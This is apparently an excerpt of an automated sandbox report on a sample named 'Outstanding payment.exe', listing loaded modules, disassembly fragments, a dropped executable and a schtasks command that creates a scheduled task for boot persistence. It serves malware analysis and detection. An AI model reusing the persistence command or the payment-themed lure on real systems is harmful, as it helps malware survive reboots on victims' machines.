Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: snmpapi.dll

Source: C:\Users\user\Desktop\Outstanding payment.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Outstanding payment.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Outstanding payment.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Outstanding payment.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msiexec.pdb source: RegSvcs.exe, 0000000F.00000002.2163601401.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2167593167.0000000001950000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.4525647281.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netstat.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2166629916.0000000001520000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2166042893.0000000001038000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169801736.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.2163601401.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2167593167.0000000001950000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.4525647281.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netstat.pdb source: RegSvcs.exe, 00000009.00000002.2166629916.0000000001520000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2166042893.0000000001038000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169801736.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 0000000A.00000002.4544436194.000000001108F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526176931.0000000002B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4527606666.0000000004C8F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.2164292767.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2162873949.00000000043E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526844248.0000000004740000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2165021648.0000000004596000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526844248.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000003.2168122863.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169828122.00000000032BE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169828122.0000000003120000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000003.2166132931.0000000000DB1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.2164292767.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2162873949.00000000043E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526844248.0000000004740000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2165021648.0000000004596000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526844248.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000003.2168122863.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169828122.00000000032BE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000002.2169828122.0000000003120000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000011.00000003.2166132931.0000000000DB1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 0000000A.00000002.4544436194.000000001108F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.4526176931.0000000002B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.4527606666.0000000004C8F000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_01090C6C pushfd ; iretd	0_2_01090C6E
Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 0_2_0B2F036B push ecx; ret	0_2_0B2F036C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D09AD push ecx; mov dword ptr [esp], ecx	9_2_015D09B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015A1328 push eax; iretd	9_2_015A1369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015A1FEC push eax; iretd	9_2_015A1FED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01627E99 push ecx; ret	9_2_01627EAC
Source: C:\Windows\explorer.exe	Code function: 10_2_0E854B02 push esp; retn 0000h	10_2_0E854B03
Source: C:\Windows\explorer.exe	Code function: 10_2_0E854B1E push esp; retn 0000h	10_2_0E854B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_0E8549B5 push esp; retn 0000h	10_2_0E854AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_10DE99B5 push esp; retn 0000h	10_2_10DE9AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_10DE9B1E push esp; retn 0000h	10_2_10DE9B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_10DE9B02 push esp; retn 0000h	10_2_10DE9B03
Source: C:\Windows\explorer.exe	Code function: 10_2_118B09B5 push esp; retn 0000h	10_2_118B0AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_118B0B02 push esp; retn 0000h	10_2_118B0B03
Source: C:\Windows\explorer.exe	Code function: 10_2_118B0B1E push esp; retn 0000h	10_2_118B0B1F
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03190C6C pushfd ; iretd	11_2_03190C6E
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03199B79 push edi; iretd	11_2_03199B7A
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03199AB8 push esp; iretd	11_2_03199ABE
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_03199ABF push esp; iretd	11_2_03199AC2
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_031999E0 push ebx; iretd	11_2_031999E2
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_05303A41 pushfd ; ret	11_2_05303A4D
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 11_2_0B56036B push ecx; ret	11_2_0B56036C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041E1FC pushfd ; retf	15_2_0041E1FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_004172AE push ebp; retf	15_2_004172B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041D475 push eax; ret	15_2_0041D4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041D4C2 push eax; ret	15_2_0041D4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041D4CB push eax; ret	15_2_0041D532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041D52C push eax; ret	15_2_0041D532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041D580 push edx; ret	15_2_0041D957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_016009AD push ecx; mov dword ptr [esp], ecx	15_2_016009B6

Source: Outstanding payment.exe	Static PE information: section name: .text entropy: 7.532213400746095
Source: iBSWjb.exe.0.dr	Static PE information: section name: .text entropy: 7.532213400746095

Source: C:\Users\user\Desktop\Outstanding payment.exe

File created: C:\Users\user\AppData\Roaming\iBSWjb.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Outstanding payment.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
